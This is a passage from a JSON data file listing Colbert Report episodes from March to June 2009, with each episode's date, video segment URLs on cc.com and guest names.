        "http://thecolbertreport.cc.com/videos/oayyzq/mark-bittman",
        "http://thecolbertreport.cc.com/videos/tfciz3/conservative-rap-battle---michael-steele-gets-served"
      ],
      "guest": "Mark Bittman"
    },
    {
      "date": "2009-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n8kt9r/intro---03-04-09",
        "http://thecolbertreport.cc.com/videos/kob10w/space-module--colbert---scientology-s-new-galactic-overlord",
        "http://thecolbertreport.cc.com/videos/9opkqc/doom-bunker---jack-jacobs-and-stephen-moore",
        "http://thecolbertreport.cc.com/videos/sx98t6/carl-wilson",
        "http://thecolbertreport.cc.com/videos/239tij/goodnight",
        "http://thecolbertreport.cc.com/videos/1kkbbd/intro---03-03-09",
        "http://thecolbertreport.cc.com/videos/00d1sm/the-word---share-the-wealth",
        "http://thecolbertreport.cc.com/videos/nhjls5/the-murderer-was-derek"
      ],
      "guest": "Carl Wilson"
    },
    {
      "date": "2009-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ej854l/intro---03-05-09",
        "http://thecolbertreport.cc.com/videos/w194ds/obama-s-swing-set",
        "http://thecolbertreport.cc.com/videos/a7l1re/tip-wag---rush-limbaugh",
        "http://thecolbertreport.cc.com/videos/n8dlml/steven-johnson",
        "http://thecolbertreport.cc.com/videos/nfx4fy/leave-you-wanting-more",
        "http://thecolbertreport.cc.com/videos/1y41q9/doom-bunker---glenn-beck-s--war-room-"
      ],
      "guest": "Steven Johnson"
    },
    {
      "date": "2009-03-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/itgd4m/intro---03-09-09",
        "http://thecolbertreport.cc.com/videos/4bvnlr/new-baby-abraham-carter-grosz",
        "http://thecolbertreport.cc.com/videos/z9c9ak/better-know-a-district---wyoming-s-at-large---cynthia-lummis",
        "http://thecolbertreport.cc.com/videos/54ad8f/lisa-hannigan"
      ],
      "guest": "Lisa Hannigan"
    },
    {
      "date": "2009-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1h7cfe/intro---03-10-09",
        "http://thecolbertreport.cc.com/videos/i1w6au/conservative-rap-battle---droppin--science-on-michael-steele",
        "http://thecolbertreport.cc.com/videos/858jnr/coffee-induced-hallucinations",
        "http://thecolbertreport.cc.com/videos/ogsw1c/jay-keasling",
        "http://thecolbertreport.cc.com/videos/ovf9hb/sick-three-way",
        "http://thecolbertreport.cc.com/videos/mtwuig/exclusive---better-know-a-district---wyoming-s-at-large---cynthia-lummis",
        "http://thecolbertreport.cc.com/videos/psylhz/the-word---locked-and-loathed",
        "http://thecolbertreport.cc.com/videos/dw94ms/sleep-tight--abraham"
      ],
      "guest": "William Gerstenmaier, Dr. Jay Keasling"
    },
    {
      "date": "2009-03-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sa3out/intro---03-11-09",
        "http://thecolbertreport.cc.com/videos/4sbc36/earmarks-abuse-ends-tomorrow",
        "http://thecolbertreport.cc.com/videos/7bt4s0/cheating-death---legal--sweat---pre-natal-health",
        "http://thecolbertreport.cc.com/videos/rovggj/howard-fineman",
        "http://thecolbertreport.cc.com/videos/vpswgr/stephen-s-encore",
        "http://thecolbertreport.cc.com/videos/m6st31/space-module--colbert---william-gerstenmaier"
      ],
      "guest": "Howard Fineman"
    },
    {
      "date": "2009-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xum4x8/intro---03-12-09",
        "http://thecolbertreport.cc.com/videos/uvfw3m/mahmoud-s-non-consensual-endorsement-deal",
        "http://thecolbertreport.cc.com/videos/p4j2xc/craziest-f--king-thing-i-ve-ever-heard---barreleye-fish",
        "http://thecolbertreport.cc.com/videos/8nmnda/peter-singer",
        "http://thecolbertreport.cc.com/videos/8tqo3i/goodnight",
        "http://thecolbertreport.cc.com/videos/xjpl01/the-word---rand-illusion"
      ],
      "guest": "Simon Johnson, Peter Singer"
    },
    {
      "date": "2009-03-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8zwa7x/intro---03-16-09",
        "http://thecolbertreport.cc.com/videos/yz9sik/stephen-s-angry-mob-will-crush-aig",
        "http://thecolbertreport.cc.com/videos/pe3tou/better-know-a-governor---mark-sanford-update",
        "http://thecolbertreport.cc.com/videos/ck0fd5/neil-gaiman",
        "http://thecolbertreport.cc.com/videos/qxrsxr/stephen-wants-to-hug-you"
      ],
      "guest": "Jonathan Chait, Neil Gaiman"
    },
    {
      "date": "2009-03-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ogmrdd/intro---03-17-09",
        "http://thecolbertreport.cc.com/videos/v1zxe6/shout-out---the-colbert-report-overseas",
        "http://thecolbertreport.cc.com/videos/bsv6p7/world-of-nahlej---shmeat",
        "http://thecolbertreport.cc.com/videos/7byrkj/david-grann",
        "http://thecolbertreport.cc.com/videos/zrpt32/persian-gulf-countdown-clock",
        "http://thecolbertreport.cc.com/videos/59sfdt/the-new-deal---jonathan-chait"
      ],
      "guest": "David Grann"
    },
    {
      "date": "2009-03-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u70zrc/intro---03-18-09",
        "http://thecolbertreport.cc.com/videos/an5849/predator-x-discovery",
        "http://thecolbertreport.cc.com/videos/fnlgez/tip-wag---mississippi--talk-shows---syfy",
        "http://thecolbertreport.cc.com/videos/5hu17z/juan-cole",
        "http://thecolbertreport.cc.com/videos/bokh2r/sam-s-club-time",
        "http://thecolbertreport.cc.com/videos/3i8x9a/colbert-aluminum---cigar-nubs--faux-poor---blixseth"
      ],
      "guest": "Juan Cole"
    },
    {
      "date": "2009-03-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ntnm0v/intro---03-19-09",
        "http://thecolbertreport.cc.com/videos/tkjk8k/bill-posey-alligator-rumors",
        "http://thecolbertreport.cc.com/videos/oi2fxr/when-animals-attack-our-morals---chimps--lizards---spiders",
        "http://thecolbertreport.cc.com/videos/m9oys8/john-mccardell",
        "http://thecolbertreport.cc.com/videos/f189zq/space-module--colbert---vote-now",
        "http://thecolbertreport.cc.com/videos/wa8cs2/the-word---keeping-our-heads"
      ],
      "guest": "John McCardell"
    },
    {
      "date": "2009-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hta8xf/intro---03-30-09",
        "http://thecolbertreport.cc.com/videos/04agpr/violence-in-mexico",
        "http://thecolbertreport.cc.com/videos/ttpqpq/me-time---emily-yoffe-on-narcissistic-personality-disorder",
        "http://thecolbertreport.cc.com/videos/y6yflv/space-module--colbert---democracy-in-orbit",
        "http://thecolbertreport.cc.com/videos/yz8bqz/derrick-pitts"
      ],
      "guest": "Derrick Pitts"
    },
    {
      "date": "2009-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/prw3dp/intro---03-31-09",
        "http://thecolbertreport.cc.com/videos/ga9h1c/obama-s-epic-dog-quest",
        "http://thecolbertreport.cc.com/videos/19bdth/better-know-a-lobby---newspaper-association-of-america",
        "http://thecolbertreport.cc.com/videos/fkt6tu/david-plotz",
        "http://thecolbertreport.cc.com/videos/ch71k9/sudoku-answers",
        "http://thecolbertreport.cc.com/videos/7l6w83/me-time---american-narcissism",
        "http://thecolbertreport.cc.com/videos/k0knxh/30-minute-applause"
      ],
      "guest": "David Plotz"
    },
    {
      "date": "2009-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/du0pk9/intro---04-01-09",
        "http://thecolbertreport.cc.com/videos/1o1nya/french-worker-protests",
        "http://thecolbertreport.cc.com/videos/5t3340/cheating-death---sperm-sale---colonoscopies",
        "http://thecolbertreport.cc.com/videos/wol3qg/dambisa-moyo",
        "http://thecolbertreport.cc.com/videos/vof9z5/hide-and-seek",
        "http://thecolbertreport.cc.com/videos/jt0f3j/the-10-31-project"
      ],
      "guest": "Dambisa Moyo"
    },
    {
      "date": "2009-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/scsjxw/intro---04-02-09",
        "http://thecolbertreport.cc.com/videos/78s5oz/cheney-s-secret-assassination-squad",
        "http://thecolbertreport.cc.com/videos/mkb4ls/merriam-webster-s-word-s-worth",
        "http://thecolbertreport.cc.com/videos/4qhn4o/biz-stone",
        "http://thecolbertreport.cc.com/videos/5uxqom/let-your-gps-be-your-guide",
        "http://thecolbertreport.cc.com/videos/idkq46/the-word---fine-line"
      ],
      "guest": "Biz Stone"
    },
    {
      "date": "2009-04-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d5ju1a/colbert-s-easter-parade",
        "http://thecolbertreport.cc.com/videos/v1ybgk/intro---04-06-09",
        "http://thecolbertreport.cc.com/videos/f3bajc/body-loss",
        "http://thecolbertreport.cc.com/videos/y3ocaq/space-module--colbert---urine-recycling-room",
        "http://thecolbertreport.cc.com/videos/2zq8u0/rich-lowry",
        "http://thecolbertreport.cc.com/videos/k9vxpy/make-lemonade"
      ],
      "guest": "Tom Brokaw, Rich Lowry"
    },
    {
      "date": "2009-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/168lgg/intro---04-07-09",
        "http://thecolbertreport.cc.com/videos/9kk3jy/queen-noor-s-royal-treatment",
        "http://thecolbertreport.cc.com/videos/6uykwu/better-know-a-district---new-york-s-25th---dan-maffei",
        "http://thecolbertreport.cc.com/videos/31tszu/queen-noor",
        "http://thecolbertreport.cc.com/videos/pqumra/hiccup-free",
        "http://thecolbertreport.cc.com/videos/njp3xz/un-american-news---rest-of-the-world",
        "http://thecolbertreport.cc.com/videos/u5yf3y/obama-s-european-trip---tom-brokaw"
      ],
      "guest": "Queen Noor"
    },
    {
      "date": "2009-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f1gjz4/intro---04-08-09",
        "http://thecolbertreport.cc.com/videos/lyeuyj/birkat-hachama---stephen-frees-his-jews",
        "http://thecolbertreport.cc.com/videos/10cwvc/alpha-dog-of-the-week---ted-stevens",
        "http://thecolbertreport.cc.com/videos/eknw52/phil-bronstein",
        "http://thecolbertreport.cc.com/videos/jmb43t/electronic-edition",
        "http://thecolbertreport.cc.com/videos/7jw15b/the-word---morally-bankrupt"
      ],
      "guest": "Phil Bronstein"
    },
    {
      "date": "2009-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ly7fhn/workers--comp-temptation",
        "http://thecolbertreport.cc.com/videos/1adwqk/threatdown---robert-gates--dog-seders---obama",
        "http://thecolbertreport.cc.com/videos/lywaay/bart-ehrman",
        "http://thecolbertreport.cc.com/videos/vd2m1k/stephen-s-severed-head",
        "http://thecolbertreport.cc.com/videos/4wgqsm/where-and-when-is-stephen-going-to-the-persian-gulf----bahrain"
      ],
      "guest": "Bart Ehrman"
    },
    {
      "date": "2009-04-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uvnlz3/intro---04-14-09",
        "http://thecolbertreport.cc.com/videos/1tgxfo/clarence-thomas--new-job",
        "http://thecolbertreport.cc.com/videos/bz4xly/space-module--colbert---sunita-williams",
        "http://thecolbertreport.cc.com/videos/gxfl4g/susie-orbach",
        "http://thecolbertreport.cc.com/videos/5m2sci/goodnight--helen"
      ],
      "guest": "Sunita L. Williams, Susie Orbach"
    },
    {
      "date": "2009-04-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2t8bkw/intro---04-15-09",
        "http://thecolbertreport.cc.com/videos/whfbdu/obama-denies-habeas-corpus",
        "http://thecolbertreport.cc.com/videos/xkxq0s/better-know-a-district---illinois--18th---aaron-schock",
        "http://thecolbertreport.cc.com/videos/0ca7u5/jim-lehrer",
        "http://thecolbertreport.cc.com/videos/g6fu2q/homework-assignment",
        "http://thecolbertreport.cc.com/videos/5rzknc/the-word---have-your-cake-and-eat-it--too"
      ],
      "guest": "Jim Lehrer"
    },
    {
      "date": "2009-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t8chps/intro---04-16-09",
        "http://thecolbertreport.cc.com/videos/abfalc/teabagging-protests",
        "http://thecolbertreport.cc.com/videos/npq9t7/indian-elections---kanishk-tharoor",
        "http://thecolbertreport.cc.com/videos/btde8y/douglas-kmiec",
        "http://thecolbertreport.cc.com/videos/gu6q0n/goodnight-salute",
        "http://thecolbertreport.cc.com/videos/a8qba2/tax-atax"
      ],
      "guest": "Kanishk Tharoor, Doug Kmiec"
    },
    {
      "date": "2009-04-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b06wzj/intro---04-20-09",
        "http://thecolbertreport.cc.com/videos/3g58oe/castro-death-wish-list",
        "http://thecolbertreport.cc.com/videos/pzg5id/maersk-alabama---ken-quinn",
        "http://thecolbertreport.cc.com/videos/b1hfbd/tip-wag---texas-secession---maca",
        "http://thecolbertreport.cc.com/videos/qi09sh/joe-arpaio"
      ],
      "guest": "Ken Quinn, Sheriff Joe Arpaio"
    },
    {
      "date": "2009-04-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fll3xv/intro---04-21-09",
        "http://thecolbertreport.cc.com/videos/mnalwu/george-will-s-demon-denim",
        "http://thecolbertreport.cc.com/videos/hezs49/who-s-riding-my-coattails-now----blown-away-by-the-usa",
        "http://thecolbertreport.cc.com/videos/7lqvgy/mike-krzyzewski",
        "http://thecolbertreport.cc.com/videos/4dj3xs/special-dvd-commentary",
        "http://thecolbertreport.cc.com/videos/g9ilpe/anger-s-aweigh",
        "http://thecolbertreport.cc.com/videos/h6pabb/stephen-s-only-regrets"
      ],
      "guest": "Coach Mike Kryzewski"
    },
    {
      "date": "2009-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/licvuz/intro---04-22-09",
        "http://thecolbertreport.cc.com/videos/g6q0sp/-the-price-is-right--goes-green",
        "http://thecolbertreport.cc.com/videos/7ax5b6/where-and-when-is-stephen-going-to-the-persian-gulf----qatar",
        "http://thecolbertreport.cc.com/videos/ui31iq/ira-glass",
        "http://thecolbertreport.cc.com/videos/77b5v5/never-go-to-bed-angry",
        "http://thecolbertreport.cc.com/videos/zbqudz/the-word---stressed-position"
      ],
      "guest": "Ira Glass"
    },
    {
      "date": "2009-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gj1jdr/intro---04-23-09",
        "http://thecolbertreport.cc.com/videos/16z7m7/america-does-not-swear-on-camera",
        "http://thecolbertreport.cc.com/videos/dbshcz/illegitimate-grandson-of-an-alligator",
        "http://thecolbertreport.cc.com/videos/2tn51j/elizabeth-bintliff",
        "http://thecolbertreport.cc.com/videos/ylolny/goodnight--daisy",
        "http://thecolbertreport.cc.com/videos/g1doyw/summit-of-all-fears"
      ],
      "guest": "Elizabeth Bintliff"
    },
    {
      "date": "2009-04-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ak2bbq/intro---04-27-09",
        "http://thecolbertreport.cc.com/videos/u3yqqg/days-of-swine-and-doses",
        "http://thecolbertreport.cc.com/videos/ioe7hh/craziest-f--king-thing-i-ve-ever-heard---fir-tree-lung",
        "http://thecolbertreport.cc.com/videos/6ywn6l/a-rare-correction---stephen-eats-an-ewok",
        "http://thecolbertreport.cc.com/videos/jlx2r1/the-decemberists"
      ],
      "guest": "The Decemberists"
    },
    {
      "date": "2009-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5phyy1/intro---04-28-09",
        "http://thecolbertreport.cc.com/videos/pwdiki/arlen-specter-contracts-donkey-flu",
        "http://thecolbertreport.cc.com/videos/14mfow/foreign-reporting---richard-engel",
        "http://thecolbertreport.cc.com/videos/u40xb8/daniel-gross",
        "http://thecolbertreport.cc.com/videos/l8q5cp/shout-out---kids-edition"
      ],
      "guest": "Richard Engel, Daniel Gross"
    },
    {
      "date": "2009-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/we8zzj/intro---04-29-09",
        "http://thecolbertreport.cc.com/videos/0gktuh/ahmadinejad-steals-obama-s-slogan",
        "http://thecolbertreport.cc.com/videos/ou4xko/enemy-swine--a-pigcalypse-now",
        "http://thecolbertreport.cc.com/videos/i5hw2i/david-kessler",
        "http://thecolbertreport.cc.com/videos/seesef/feet-teeth",
        "http://thecolbertreport.cc.com/videos/5kllsr/where-and-when-is-stephen-going-to-the-persian-gulf----correspondents",
        "http://thecolbertreport.cc.com/videos/ewzt0z/no-animals-were-harmed"
      ],
      "guest": "David Kessler"
    },
    {
      "date": "2009-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4ncl78/intro---04-30-09",
        "http://thecolbertreport.cc.com/videos/hr47fj/president-obama---the-first-14-mondays",
        "http://thecolbertreport.cc.com/videos/zhiu9l/ethan-nadelmann",
        "http://thecolbertreport.cc.com/videos/1e83az/the-after-show",
        "http://thecolbertreport.cc.com/videos/dnh80p/i-s-on-edjukashun---textbooks--americorps---strip-search"
      ],
      "guest": "Jonathan Alter, Ethan Nadelman"
    },
    {
      "date": "2009-05-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ithaxo/code-word---empathy",
        "http://thecolbertreport.cc.com/videos/e4d421/the-prescott-group-bailout",
        "http://thecolbertreport.cc.com/videos/57pcxy/j-j--abrams",
        "http://thecolbertreport.cc.com/videos/3q06z6/sign-off---colbert-nation-home"
      ],
      "guest": "J.J. Abrams"
    },
    {
      "date": "2009-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1yb1cp/intro---05-05-09",
        "http://thecolbertreport.cc.com/videos/daeu0o/cinco-de-mayo-precautions",
        "http://thecolbertreport.cc.com/videos/73g8ui/the-word---captain-kangaroo-court",
        "http://thecolbertreport.cc.com/videos/sye42t/paul-rieckhoff",
        "http://thecolbertreport.cc.com/videos/xul98m/sign-off---iteam",
        "http://thecolbertreport.cc.com/videos/0a05it/movies-that-are-destroying-america---summer-movie-edition"
      ],
      "guest": "Cliff Sloan, Paul Rieckhoff"
    },
    {
      "date": "2009-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4aqttz/intro---05-06-09",
        "http://thecolbertreport.cc.com/videos/k97z53/colbert-branson-duel",
        "http://thecolbertreport.cc.com/videos/4h8qcx/where-and-when-is-stephen-going-to-the-persian-gulf----saudi-arabia",
        "http://thecolbertreport.cc.com/videos/q7lfqg/laurie-garrett",
        "http://thecolbertreport.cc.com/videos/2y8ihh/hug-your-television",
        "http://thecolbertreport.cc.com/videos/mekuw6/picking-a-new-supreme-court-justice---cliff-sloan"
      ],
      "guest": "Laurie Garrett"
    },
    {
      "date": "2009-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nqr22g/intro---05-07-09",
        "http://thecolbertreport.cc.com/videos/40ivqy/sean-hannity-s-liberty-tree",
        "http://thecolbertreport.cc.com/videos/ednx54/smokin--pole---the-fight-for-arctic-riches--inuit-nation",
        "http://thecolbertreport.cc.com/videos/as8qiu/mitchell-joachim",
        "http://thecolbertreport.cc.com/videos/4bas9p/spay-and-neuter-your-pets",
        "http://thecolbertreport.cc.com/videos/686y3f/tip-wag---forced-smoking---grizzly-best-man"
      ],
      "guest": "Mitchell Joachim"
    },
    {
      "date": "2009-05-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/imn21t/intro---05-11-09",
        "http://thecolbertreport.cc.com/videos/cctfpl/stephen-s-fancy-feast",
        "http://thecolbertreport.cc.com/videos/bwc8x1/credit-card-industry-regulation---tamara-draut",
        "http://thecolbertreport.cc.com/videos/cguksk/alpha-dog-of-the-week---erik-slye",
        "http://thecolbertreport.cc.com/videos/3ttm11/jeff-daniels"
      ],
      "guest": "Tamara Draut"
    },
    {
      "date": "2009-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wr98c1/intro---05-12-09",
        "http://thecolbertreport.cc.com/videos/zy5zj6/howard-s-end",
        "http://thecolbertreport.cc.com/videos/n89zl7/cuba-us-trade-relations---julia-sweig",
        "http://thecolbertreport.cc.com/videos/hs7gtm/stephen-s-sound-advice---how-to-re-brand-the-gop",
        "http://thecolbertreport.cc.com/videos/a0bgn9/ron-howard",
        "http://thecolbertreport.cc.com/videos/6fx090/credit-check",
        "http://thecolbertreport.cc.com/videos/lzvish/sign-off---unicorn-dealership"
      ],
      "guest": "Ron Howard"
    },
    {
      "date": "2009-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yvcq61/intro---05-13-09",
        "http://thecolbertreport.cc.com/videos/g3716f/robert-gibbs-hates-ringing-cell-phones",
        "http://thecolbertreport.cc.com/videos/hp9jyy/colbert-platinum----1-000-dishes",
        "http://thecolbertreport.cc.com/videos/eon7i2/michael-pollan",
        "http://thecolbertreport.cc.com/videos/0it13s/stephen-colbert-is-awesome",
        "http://thecolbertreport.cc.com/videos/5715dt/our-plan-in-havana",
        "http://thecolbertreport.cc.com/videos/g7s21x/you-are-a-dummy"
      ],
      "guest": "Michael Pollan"
    },
    {
      "date": "2009-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ph1m2t/intro---05-14-09",
        "http://thecolbertreport.cc.com/videos/priitm/caveman-porn-stash",
        "http://thecolbertreport.cc.com/videos/phfour/donorschoose-org-donations",
        "http://thecolbertreport.cc.com/videos/m82ydm/yusuf",
        "http://thecolbertreport.cc.com/videos/vyychn/stephen-s-coke-party-protest"
      ],
      "guest": "Yusuf"
    },
    {
      "date": "2009-05-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hopfi8/intro---05-18-09",
        "http://thecolbertreport.cc.com/videos/gc17yz/welcome-to-the-real-world--obama",
        "http://thecolbertreport.cc.com/videos/oh4xki/threatdown---charity--casual-jesus---robot-teachers",
        "http://thecolbertreport.cc.com/videos/phv8h6/meghan-mccain",
        "http://thecolbertreport.cc.com/videos/h4dfgj/sign-off---internal-clock"
      ],
      "guest": "Meghan McCain"
    },
    {
      "date": "2009-05-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k69zx1/intro---05-19-09",
        "http://thecolbertreport.cc.com/videos/um8x6x/rumsfeld-s-cover-letter-bible-quotes",
        "http://thecolbertreport.cc.com/videos/9w54d6/difference-makers---stephen-keith",
        "http://thecolbertreport.cc.com/videos/tn9xuo/walter-kirn",
        "http://thecolbertreport.cc.com/videos/l2dw5z/stephen-s-show",
        "http://thecolbertreport.cc.com/videos/y5v5ns/the-word---tough-cell"
      ],
      "guest": "Walter Kirn"
    },
    {
      "date": "2009-05-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zq89uw/intro---05-20-09",
        "http://thecolbertreport.cc.com/videos/b9eth2/extra--extra--bleed-all-about-it-",
        "http://thecolbertreport.cc.com/videos/e5f1sd/donorschoose-org-classroom-projects",
        "http://thecolbertreport.cc.com/videos/u2rpts/seth-shostak",
        "http://thecolbertreport.cc.com/videos/m63aac/goodnight",
        "http://thecolbertreport.cc.com/videos/i401ml/the-word---i-know-you-are-but-what-am-i-"
      ],
      "guest": "Seth Shostak"
    },
    {
      "date": "2009-05-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sll291/intro---05-21-09",
        "http://thecolbertreport.cc.com/videos/hck7te/47-million-year-old-fossil",
        "http://thecolbertreport.cc.com/videos/4kzrbn/formidable-opponent---pragmatism-or-idealism",
        "http://thecolbertreport.cc.com/videos/ait1y2/green-day",
        "http://thecolbertreport.cc.com/videos/iuaf6k/she-said--cia-said---bob-graham"
      ],
      "guest": "Green Day"
    },
    {
      "date": "2009-06-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kbuqbk/intro---06-01-09",
        "http://thecolbertreport.cc.com/videos/ckumab/guns-in-national-parks",
        "http://thecolbertreport.cc.com/videos/ezeifx/sonia-sotomayor-s-nomination---jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/2p70rc/where-and-when-is-stephen-going-to-the-persian-gulf----united-arab-emirates",
        "http://thecolbertreport.cc.com/videos/4suoo4/byron-dorgan"
      ],
      "guest": "Jeffrey Toobin, Sen. Byron Dorgan"
    },
    {
      "date": "2009-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/poyt56/intro---06-02-09",
        "http://thecolbertreport.cc.com/videos/xahwo7/saudi-arabia-press-restrictions",
        "http://thecolbertreport.cc.com/videos/m4ur7f/jim-moran-vs--viagra",
        "http://thecolbertreport.cc.com/videos/bpwglm/katty-kay",
        "http://thecolbertreport.cc.com/videos/860dm5/best-audience-of-the-night",
        "http://thecolbertreport.cc.com/videos/ch9xnn/supreme-court-press",
        "http://thecolbertreport.cc.com/videos/t28i3d/dance-for-stephen"
      ],
      "guest": "Katty Kay"
    },
    {
      "date": "2009-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lte593/intro---06-03-09",
        "http://thecolbertreport.cc.com/videos/1azzsn/we-have-a-death-star-",
        "http://thecolbertreport.cc.com/videos/in49m6/tip-wag---4th-of-july--craig-t--nelson---gm",
        "http://thecolbertreport.cc.com/videos/ughago/eric-schlosser",
        "http://thecolbertreport.cc.com/videos/fw7nrm/sign-off----the-hollow-men-",
        "http://thecolbertreport.cc.com/videos/rfeepg/cheating-death---cheerios--soda-paralysis---oprah-s-crazy-talk"
      ],
      "guest": "Eric Schlosser"
    },
    {
      "date": "2009-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rpkl6b/intro---06-04-09",
        "http://thecolbertreport.cc.com/videos/oqx005/wikipedia-bans-scientologists",
        "http://thecolbertreport.cc.com/videos/anuhnx/craziest-f--king-thing-i-ve-ever-heard---external-lungs",
        "http://thecolbertreport.cc.com/videos/obi6e0/dag-soderberg",
        "http://thecolbertreport.cc.com/videos/u226dl/the-word---i-do--you-don-t"
      ],
      "guest": "Dag Soderberg, David Byrne"
    },
    {
      "date": "2009-06-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gbu94e/operation-iraqi-stephen---mysterious-trip",
        "http://thecolbertreport.cc.com/videos/wy7a2l/operation-iraqi-stephen---john-mccain",
        "http://thecolbertreport.cc.com/videos/n4g2vg/stephen-strong---army-of-me---basic-training-pt--1",
        "http://thecolbertreport.cc.com/videos/c4z5y3/obama-orders-stephen-s-haircut---ray-odierno",
        "http://thecolbertreport.cc.com/videos/m6uaot/sign-off---new-haircut"
      ],
      "guest": "Stephen broadcasts from Iraq, Gen. Ray Odierno"
    },
    {
      "date": "2009-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xuowp6/operation-iraqi-stephen---s-h-",
        "http://thecolbertreport.cc.com/videos/nlvzz2/operation-iraqi-stephen---bill-clinton---amp-energy",
        "http://thecolbertreport.cc.com/videos/8querl/formidable-opponent---don-t-ask--don-t-tell",
        "http://thecolbertreport.cc.com/videos/xjmvnq/tareq-salha---robin-balcom",
        "http://thecolbertreport.cc.com/videos/bdo17v/sign-off---hi--stephen-s-mom",
        "http://thecolbertreport.cc.com/videos/clgan9/the-word---why-are-you-here-"
      ],
      "guest": "Stephen broadcasts from Iraq (1)"
    },
    {
      "date": "2009-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3avxyi/operation-iraqi-stephen---stephen-s-spider-hole",
        "http://thecolbertreport.cc.com/videos/cyrxgp/admiral-crunch",
        "http://thecolbertreport.cc.com/videos/xfobul/lt--gen--charles-h--jacoby-jr-",
        "http://thecolbertreport.cc.com/videos/jk0yi6/sign-off---head-rub",
        "http://thecolbertreport.cc.com/videos/nlng6v/operation-iraqi-stephen---tom-hanks-care-package",
        "http://thecolbertreport.cc.com/videos/xbtx2g/stephen-strong---army-of-me---basic-training-pt--2"
      ],
      "guest": "Stephen broadcasts from Iraq (2)"
    },
    {
      "date": "2009-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x1yyko/stephen-gets-his-hair-cut",
        "http://thecolbertreport.cc.com/videos/ithwrz/operation-iraqi-stephen---golf-club---george-w--bush-s-greeting",
        "http://thecolbertreport.cc.com/videos/9p7eto/operation-iraqi-stephen---fallback-position---air-force-thunderbirds",
        "http://thecolbertreport.cc.com/videos/hqcfyh/operation-iraqi-stephen---frank-a--grippe",
        "http://thecolbertreport.cc.com/videos/aa7w7z/operation-iraqi-stephen---sign-off---honey--i-m-coming-home",
        "http://thecolbertreport.cc.com/videos/74tfzb/better-know-a-cradle-of-civilization---barham-saleh"
      ],
      "guest": "Stephen broadcasts from Iraq (3)"
    },
    {
      "date": "2009-06-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7zoy4v/intro---06-15-09",
        "http://thecolbertreport.cc.com/videos/ycfoc7/warm-memories-of-iraq",
        "http://thecolbertreport.cc.com/videos/cgcvlh/car-shout---gm---chrysler",
        "http://thecolbertreport.cc.com/videos/px4jql/austan-goolsbee",
        "http://thecolbertreport.cc.com/videos/22hank/sign-off---driving-for-the-last-10-minutes"
      ],
      "guest": "Austan Goolsbee"
    },
    {
      "date": "2009-06-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6kwzzi/intro---06-16-09",
        "http://thecolbertreport.cc.com/videos/e51xox/croatia-s-biggest-jeans-world-record",
        "http://thecolbertreport.cc.com/videos/86p43v/teh-runoff---karim-sadjadpour",
        "http://thecolbertreport.cc.com/videos/guirtz/balls-for-kidz---carnivals-encore",
        "http://thecolbertreport.cc.com/videos/8g3agb/jim-rogers",
        "http://thecolbertreport.cc.com/videos/1bur1p/stephen-s-sound-advice---how-to-be-a-totalitarian-nutjob"
      ],
      "guest": "Karim Sadjadpour, Jim Rogers"
    },
    {
      "date": "2009-06-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vz7xis/intro---06-17-09",
        "http://thecolbertreport.cc.com/videos/y8n8bj/stephen-s-positive-obama-coverage",
        "http://thecolbertreport.cc.com/videos/v8qfms/the-word---bohemian-grove",
        "http://thecolbertreport.cc.com/videos/fgc5qj/alpha-dog-of-the-week---silvio-berlusconi",
        "http://thecolbertreport.cc.com/videos/6wqhd0/joshua-micah-marshall",
        "http://thecolbertreport.cc.com/videos/1jvq35/teh-runoff",
        "http://thecolbertreport.cc.com/videos/31otgs/goodnight"
      ],
      "guest": "Joshua Micah Marshall"
    },
    {
      "date": "2009-06-18",
